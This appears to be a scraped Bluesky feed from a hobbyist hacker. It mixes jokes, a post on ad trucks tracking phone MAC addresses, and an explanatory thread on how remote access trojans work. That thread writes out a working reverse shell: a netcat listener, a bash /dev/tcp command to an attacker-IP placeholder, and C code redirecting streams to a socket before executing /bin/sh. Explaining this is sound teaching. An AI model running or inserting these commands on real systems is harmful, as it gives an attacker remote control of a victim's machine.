@knownhost.bsky.social
wannabe h4ck3r | recurse center alum
radio hat
15.08.2025 15:43 β π 0 π 0 π¬ 0 π 0Simplified example: I see an ad for Dove shampoo on a delivery truck. The truck captures the MAC address of my phone. Later on Iβm at Target and buy Dove shampoo, instead of Axe. Cross referencing my Target rewards with the MAC address, Dove infers the campaign was effective. (2/2)
08.04.2025 19:26 β π 0 π 0 π¬ 0 π 0TIL: Some delivery trucks that display ads arenβt actually making deliveries. Instead they are marketing campaigns that use WiFi beacons to track your deviceβs MAC address + location for targeting purposes. (1/2)
08.04.2025 19:25 β π 2 π 0 π¬ 1 π 0spinach is a scam
21.01.2025 23:56 β π 4 π 0 π¬ 0 π 0Soβ¦ if Canada becomes a US state, how many electoral votes does it get?
Will probably make it difficult for Republicans to retain the presidency, especially when Canadians all lose their healthcare.
@proton.me second major protonmail outage in a month and i missed the link to join an interview π
09.01.2025 16:20 β π 5 π 0 π¬ 0 π 0implement βquick accessβ and iβll make the switch from 1pass
09.01.2025 16:17 β π 0 π 0 π¬ 0 π 0at approx. 12:00PM (UTC+10) we will start scaling up santa pods (clones of original santa process) across geos- this will ensure efficient and sustainable present delivery
24.12.2024 18:54 β π 0 π 0 π¬ 0 π 0instead of a linear delivery route (NPOLE => DEST) present caches should be established across geos
24.12.2024 18:53 β π 0 π 0 π¬ 1 π 0the toy production process is sufficiently distributed with scaling worker pods (elves), however the santa delivery sleigh is very inefficient and must be optimized
24.12.2024 18:36 β π 0 π 0 π¬ 1 π 0systems design interview but itβs for santaβs delivery queue on xmas eve
24.12.2024 18:33 β π 1 π 0 π¬ 1 π 0
The TLS Protocol Version 1.0 RFC, January 1999, in ugly meme form. Top text: I am not a toy I am not a Christmas present I am a 30+ years commitment Bottom text: Please think hard before you give someone an Internet standard this Christmas
22.12.2024 14:06 β π 1123 π 219 π¬ 6 π 3TIL everything is a psyop
20.12.2024 17:08 β π 2 π 0 π¬ 0 π 0spy kids (2001) was a cia psyop just check out cia.gov/spy-kids
20.12.2024 17:08 β π 0 π 0 π¬ 0 π 0spotify wrapped is a cia psyop to reinforce the surveillance state π€·ββοΈ
20.12.2024 17:06 β π 0 π 0 π¬ 0 π 0this basically aliases all the standard streams to the socket to provide the attacker an interactive shell to the victims machine.
full write-up here: jackcarrick.net/blog/reverse...
because βeverything is a fileβ in unix systems you can do the same redirection with a networking socket
int socket
...
dup2(socket, STDIN_FILENO);
dup2(socket, STDOUT_FILENO);
dup2(socket, STDERR_FILENO);
Then execute a shell
execve("/bin/sh", argv, NULL);
so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily
echo βfooβ > bar.txt
internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)
upon connecting to the server an attacker can input commands into the victims shell as if it were their own more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start
15.12.2024 16:32 β π 0 π 0 π¬ 1 π 0curious how malware like remote access trojans (RATs) work? turns out you can create a very basic one with two commands:
attacker runs a TCP server:
nc -nlp 4444
victim connects to the server:
bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1
this is called a reverse shell
so how does this work? in unix systems we can redirect standard communication streams (stdin, stdout, stderr) easily
echo βfooβ > bar.txt
internally this uses the dup2 system call:
dup2(old file descriptor, new file descriptor)
upon connecting to the server an attacker can input commands into the victims shell as if it were their own
more robust RATs include more sophisticated control mechanisms (GUIs, keyloggers, webcam access, etc), but this is a pretty good start
